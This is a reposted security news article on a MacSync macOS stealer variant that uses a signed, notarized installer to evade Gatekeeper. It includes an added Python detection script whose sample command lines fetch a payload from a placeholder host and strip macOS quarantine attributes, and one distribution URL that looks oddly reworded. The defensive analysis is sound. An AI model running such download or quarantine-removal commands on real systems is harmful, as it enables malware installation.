Cyber Web Spider Blog – News

New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper


Posted on December 24, 2025 By CWS

Dec 24, 2025 | Ravie Lakshmanan | Malware / Endpoint Security
Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that is delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple’s Gatekeeper checks.
“In contrast to earlier MacSync Stealer variants that primarily depend on drag-to-terminal or ClickFix-style strategies, this sample adopts a more misleading, hands-off method,” Jamf researcher Thijs Xhaflaire said.
The Apple device management and security company said the latest version is distributed as a code-signed and notarized Swift application inside a disk image (DMG) file named “zk-call-messenger-installer-3.9.2-lts.dmg” that is hosted on “zkcall[.]internet/obtain.”

The fact that it is signed and notarized means it can be run without being blocked or flagged by built-in security controls like Gatekeeper or XProtect. Despite this, the installer has been found to display instructions prompting users to right-click and open the app, a common tactic used to sidestep such safeguards. Apple has since revoked the code signing certificates.
The Swift-based dropper then performs a series of checks before downloading and executing an encoded script through a helper component. This includes verifying internet connectivity, enforcing a minimum execution interval of around 3600 seconds to implement a rate limit, and removing quarantine attributes and validating the file prior to execution.
“Notably, the curl command used to retrieve the payload reveals clear deviations from earlier variants,” Xhaflaire explained. “Rather than utilizing the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and extra options like --noproxy have been introduced.”

“These modifications, together with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely geared toward enhancing reliability or evading detection.”
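The flag split described above defeats any detection rule that matches the literal string `-fsSL`. The following is an added example, not code from Jamf or the original report: it expands curl's bundled short options into a set before matching, so both spellings produce the same result. The rule labels, the sample command lines, and the `xattr -d com.apple.quarantine` form of quarantine removal are assumptions made for illustration.

```python
import shlex

# curl short options that take a value (subset, enough to skip their arguments)
TAKES_VALUE = set("oHdAeuxmKXwTCbcFEQrYyz")
LONG_TO_SHORT = {"--fail": "-f", "--silent": "-s",
                 "--show-error": "-S", "--location": "-L"}

def curl_flags(argv):
    """Return curl's options as a set, expanding bundles such as -fsSL."""
    flags, i = set(), 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--"):
            name = tok.split("=", 1)[0]
            flags.add(LONG_TO_SHORT.get(name, name))
        elif tok.startswith("-") and len(tok) > 1:
            for pos, ch in enumerate(tok[1:], 1):
                flags.add("-" + ch)
                if ch in TAKES_VALUE:
                    if pos == len(tok) - 1:   # value is the next token
                        i += 1
                    break                     # otherwise rest of token is the value
        i += 1
    return flags

def classify(cmdline):
    """Label one process command line with the behaviours it shows."""
    argv = shlex.split(cmdline)
    if not argv:
        return []
    prog, hits = argv[0].rsplit("/", 1)[-1], []
    if prog == "curl":
        flags = curl_flags(argv)
        if {"-f", "-s", "-S", "-L"} <= flags:
            hits.append("curl-quiet-follow")
        if "--noproxy" in flags:
            hits.append("curl-noproxy")
    # Assumption: quarantine removal appears as `xattr -d com.apple.quarantine`
    if prog == "xattr" and "com.apple.quarantine" in argv and \
            any(a.startswith("-") and "d" in a for a in argv[1:]):
        hits.append("quarantine-removed")
    return hits

# Constructed sample command lines (not taken from the report)
SAMPLES = [
    "curl -fsSL https://example.invalid/a.sh",
    "/usr/bin/curl -fL -sS --noproxy '*' -o /tmp/p https://example.invalid/p",
    "xattr -d com.apple.quarantine /tmp/p",
]
if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), s)
```

Fed with process-execution telemetry, the same normalisation lets a rule key on the behaviour (quiet, fail-fast, redirect-following download that bypasses the proxy) instead of on one spelling of the flags.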
Another evasion mechanism used in the campaign is the use of an unusually large DMG file, inflating its size to 25.5 MB by embedding unrelated PDF documents.
The Base64-encoded payload, once parsed, corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, comes fitted with a fully-featured Go-based agent that goes beyond simple data theft and enables remote command-and-control capabilities.

It is worth noting that code-signed versions of malicious DMG files mimicking Google Meet have also been observed in attacks propagating other macOS stealers like Odyssey. That said, threat actors have continued to rely on unsigned disk images to deliver DigitStealer as recently as last month.
“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly try to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said.

The Hacker News | Tags: App, Apple, Bypass, Gatekeeper, macOS, MacSync, Signed, Stealer
